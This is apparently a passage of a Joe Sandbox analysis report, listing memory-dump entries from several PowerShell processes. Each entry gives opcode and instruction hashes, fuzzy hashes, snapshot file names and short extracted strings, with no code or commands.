                                                                                                                                                                                                                                                                                      • Instruction ID: e0777c0fbcceb3c386272404b3cefeea0bd99947b0d7ce89a5c916518cfc2702
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c35484bc8e0ba023d020185c3ab8e81cbe63c1a39fdef97a7d5ffc0ee275ce81
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBD12232D0EACA9FEB69EF285C565B5BBA0EF15754F0801BAD04DC7083EA19EC45C391
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2899609849.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 4c92ba2dbd9318536e628244690a66f510cf277010b50aa35f32c644a1193a37
                                                                                                                                                                                                                                                                                      • Instruction ID: 24bba99f73ae7fc0d13a794006d32778f7ffb8f12e7d51eabbc99afb76fa2ab0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c92ba2dbd9318536e628244690a66f510cf277010b50aa35f32c644a1193a37
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8071493191CA484FEB48EF5CC885AB57BE0EFA5361F14017FD08AC7297DB25A846CB91
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2899609849.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 6b1aaf424d71f5e2e31098e28e1bf30f949379cbbb6f22690251ef1c83598adc
                                                                                                                                                                                                                                                                                      • Instruction ID: fa6de102e524937c7e73f3921df60546541b37a94ae71a139d9c0e7bc94898c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b1aaf424d71f5e2e31098e28e1bf30f949379cbbb6f22690251ef1c83598adc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF41F631A0CB888FDB19DB1C9C0A6A97FE1FB65710F04416FD049D3293DA64A859CBC7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2896246341.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff848e2d000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: ff61de37ebecaad5f4fad9006c8cd73c84828881995a6519eaae729d0fb113d5
                                                                                                                                                                                                                                                                                      • Instruction ID: 12b57fb4536f8b0f9e7d05f81974aa20150d301c61b866f81107b036dc39af4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff61de37ebecaad5f4fad9006c8cd73c84828881995a6519eaae729d0fb113d5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6341057180DBC54FE7579B3898559623FF0FF46350B1905EFD088CB1A3D625A846C792
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2903693525.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: ba37b7b8823d08bbcfac5b9c00c43a10ac0b5709247faf8e1977f712efec6243
                                                                                                                                                                                                                                                                                      • Instruction ID: 28d08162d6562d706c31e3abbda99fa577cb5819a011bc6e899894910c025867
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba37b7b8823d08bbcfac5b9c00c43a10ac0b5709247faf8e1977f712efec6243
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10118231B0D9198FDB59EE0CE4429E873E1EF9976171400BBD10AC71A2EA25EC55C785
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2903693525.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: c48fde6529b1599597034bc6f6e0b3f167b612dbf328350d933c74b436f57053
                                                                                                                                                                                                                                                                                      • Instruction ID: 5445b3f5ba5123c10107ec121137f4a6f50e5150cf1720b0cbae80fc2eb3934b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c48fde6529b1599597034bc6f6e0b3f167b612dbf328350d933c74b436f57053
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61118E32B0C9588FDB54EF0CE4429E8B7E1FF55364B5400ABD10AC7163EA26EC55C794
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2899609849.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                                      • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2899609849.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a0d31aabeff015c4036c94d1561e98361743fa02f2b08f565b09e9911c1408a9
                                                                                                                                                                                                                                                                                      • Instruction ID: f3227c245855e180b44e22c2479752ddc801c0e6ca55e7a07d9ac522ad560fcf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0d31aabeff015c4036c94d1561e98361743fa02f2b08f565b09e9911c1408a9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CF0C87690D9CC4FEB81EB2C98550E9BFA0FFA5244F0402BBD449C7092EB265858CB81
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2903693525.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 2d6bc26ff5e6452a5dec92e05965c735ee2ab2c1b8758cc1b1c1692c5942e065
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d12fdf30fe4d1b7c6cb6b7258cb45a2f92b7cb5dcd79ff714b57d7af8be433b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d6bc26ff5e6452a5dec92e05965c735ee2ab2c1b8758cc1b1c1692c5942e065
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF0BE32A0C6458FDB68EF0CE4058E8B3E0EF55360B1500BAE01DC71A3EB26EC408745
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2903693525.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff849010000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5f79060678695fb893138670a4d3b06e80e8a3171202b331fa495b0adee33d58
                                                                                                                                                                                                                                                                                      • Instruction ID: af329789e35aeed904c410f63d3c468d3e77d8a55678cb6f8687ac5edc83d8d4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f79060678695fb893138670a4d3b06e80e8a3171202b331fa495b0adee33d58
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F05E31A0D5858FDB64EF1CE4458A8B7E0FF45361B5500B6E14DC7063EB26EC54C755
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000014.00000002.2899609849.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_20_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                                                                                                                                                                                                                                      • API String ID: 0-2350917820
                                                                                                                                                                                                                                                                                      • Opcode ID: ee77675de092efcf29a4295c7a300c703afad0ba1785fd555aef910a4be746e1
                                                                                                                                                                                                                                                                                      • Instruction ID: 9986dd489854e94b407d4e843bcd3186f07b3c56dbcf33a55f797e48646eb4ac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee77675de092efcf29a4295c7a300c703afad0ba1785fd555aef910a4be746e1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65212673A29515AACA02377CB8415D977A0EF543BC74503F3E018DF013DE1CA4CB8694
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3138679525.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: (B#I$(B#I$(B#I$(B#I$(B#I
                                                                                                                                                                                                                                                                                      • API String ID: 0-1620291718
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b33430a56dc6d81f12374a49ef9d5f9828036b313c981cb0d8f43dccb8b820c
                                                                                                                                                                                                                                                                                      • Instruction ID: 82903a26a15fb7bdc5c5193d1e3fb760d52af8c3c46c9e13198358b71523f60d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b33430a56dc6d81f12374a49ef9d5f9828036b313c981cb0d8f43dccb8b820c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AD16431D1EA8E5FEBA9EB2858545B5BBA1EF15390F1801FED04DCB0D3EA1CA805C356
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3135410576.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848f15000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5825c5c83e776c2f1ac08c4d907cb60a0ddac365a62d9bb70a347ad823407ff8
                                                                                                                                                                                                                                                                                      • Instruction ID: 9ef7383bfd2c9bd68ceb513ed353cac5cad38d3f36f971a7ffdb45c8c075fd8d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5825c5c83e776c2f1ac08c4d907cb60a0ddac365a62d9bb70a347ad823407ff8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E591273092CA888FE749EF28C4896B5BBE1FF95351F14417EC08AC3196DB25EC46CB51
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3135410576.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848f15000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a89cc4668b22a9716384f597f7f63b24046531284e3f50f124040759d08821d6
                                                                                                                                                                                                                                                                                      • Instruction ID: a37a0a575da44215a46e56e550a9f07696051b21f3282f3206bf9a287510e519
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89cc4668b22a9716384f597f7f63b24046531284e3f50f124040759d08821d6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00713B77D0D9914FE316AB3CAC650E53B60FF11BAAF0801B7D1988A0D3EE195C5687C6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3135410576.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848f15000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 24b7c5b8391ad469038a07700fd3656a01dea6c60f286110f6db78e15440f6a2
                                                                                                                                                                                                                                                                                      • Instruction ID: dbeb5ec13a94398dbb82217505bbab24ff8d8d2198098de9bff07ff9ab5d3b22
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24b7c5b8391ad469038a07700fd3656a01dea6c60f286110f6db78e15440f6a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C941B477D0DE928FE356AB2CAC550E13B90FF21FD6F0801BAD089860D3EE195C568685
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3135410576.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848f15000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: ecba92e737f51580b352b1fadbce646322e49de90bd249037fde5e88f6297a88
                                                                                                                                                                                                                                                                                      • Instruction ID: ed737a99fdbfcf8fd33144dc702bd146d073d0eb187bdf16c7a1f32fd41901f1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecba92e737f51580b352b1fadbce646322e49de90bd249037fde5e88f6297a88
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6841FB31A0CA489FDB58AF1CAC066F97BE1FB65710F00412FE449C3692CB75A85687C7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3132337574.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848dfd000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 581f11860a36b853402b2e8e9cf2340590edca25a7be3fb7448c162956389c4a
                                                                                                                                                                                                                                                                                      • Instruction ID: 77b10f8e3895738d9fd389156faa1f7a3ba9dd96d01fdd03ce08210b7d990d38
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 581f11860a36b853402b2e8e9cf2340590edca25a7be3fb7448c162956389c4a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41063180EBC44FE7569B289C41A523FF0EF57260F1906DFD088CB5A3D729A84AC792
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3138679525.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 49d58d7763811e171874b949e66b7e2e7b4779db6ae6ab4187a2017470e836d9
                                                                                                                                                                                                                                                                                      • Instruction ID: dc5b3f6a5b877f69ed45f2dd0bd6d1d01e761deadd50e81d1eeedeb930c9832d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49d58d7763811e171874b949e66b7e2e7b4779db6ae6ab4187a2017470e836d9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A118E32B0D9198FDB59EB0CE4419F873E1EFA8761B1400BBD10AC71A2DB29EC56C785
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3138679525.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 448fc1e08d4b5db29c2dab2fff823330f4da42fd2b307ca2b315ff215e8e1409
                                                                                                                                                                                                                                                                                      • Instruction ID: ad82f8d91b71bdcc5bbac7e4c724964ecfcfde893a6adea8a8eb89b7c7df34c8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 448fc1e08d4b5db29c2dab2fff823330f4da42fd2b307ca2b315ff215e8e1409
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E118E32B0C9088FDB54EB0CE4419F8B7E1EF54364B5400ABD10AC71A3DB29EC55C795
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3135410576.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                                                                      • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3138679525.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e7edd209901f3e2893f5d5bc6a96af966cae25e431fe1eba45b8899dbd4bd2db
                                                                                                                                                                                                                                                                                      • Instruction ID: c22a7a5bf575f795bf10398961241c508bb6adc3c637ba9f52bfcb0741616011
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7edd209901f3e2893f5d5bc6a96af966cae25e431fe1eba45b8899dbd4bd2db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F0B431A0C9058FD759EB0CE4044A473E0FF59360F1500BAE01DC71A3DB29EC408745
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3138679525.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9ae97a8d8fd737ab28c7d74f785bcd9486956881b3810d3c4936efef4af6403b
                                                                                                                                                                                                                                                                                      • Instruction ID: 222751ec4fb05e36e8befe769d74d37b2eb345aa0d2d3dc6175970d995a203c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ae97a8d8fd737ab28c7d74f785bcd9486956881b3810d3c4936efef4af6403b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF0B832A0CA448FD758EB0CE4448A8B3E0FF05320F0500BAE00ECB4A3DB2AEC608755
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3135410576.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848f15000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                                                      • API String ID: 0-3900292545
                                                                                                                                                                                                                                                                                      • Opcode ID: 7279cd1a28db54b821eb901932a21ef0db86ad5a2c42b5fec510c35ecbd5a911
                                                                                                                                                                                                                                                                                      • Instruction ID: d68b1ddbc8f6b414f4099535cb66680eda24d74e7bccc94fbb99f50b373055ba
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7279cd1a28db54b821eb901932a21ef0db86ad5a2c42b5fec510c35ecbd5a911
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5541BF73D1EAD26FE34A97285D690E53FA0EF22794F4D01F6C1888B0D3EE185C0B9256
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000017.00000002.3135410576.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_7ff848f15000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                                                                                                                                                                                                                      • API String ID: 0-3508309026
                                                                                                                                                                                                                                                                                      • Opcode ID: 169d89fe43dcaef62c425c4dc44c28542a44ea6a89770d4b667b9c47785a3973
                                                                                                                                                                                                                                                                                      • Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 169d89fe43dcaef62c425c4dc44c28542a44ea6a89770d4b667b9c47785a3973
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3529520592.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: (B#I$(B#I$(B#I$(B#I$(B#I
                                                                                                                                                                                                                                                                                      • API String ID: 0-1620291718
                                                                                                                                                                                                                                                                                      • Opcode ID: eb863fd4ae60793fb6b25a722f63b028ae885321d3ef7f5b35826b67be9fe53e
                                                                                                                                                                                                                                                                                      • Instruction ID: 0b85a2f0d2d3de896f3fe17a1a8c4db97ff703674f5320a7786081346641e36b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb863fd4ae60793fb6b25a722f63b028ae885321d3ef7f5b35826b67be9fe53e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BD15231D1EA8E5FEBA9EB2858545B57BA0EF15390F1801FED04DCB0D3EA1CA805C356
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3525776659.00007FF848F1B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1B000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
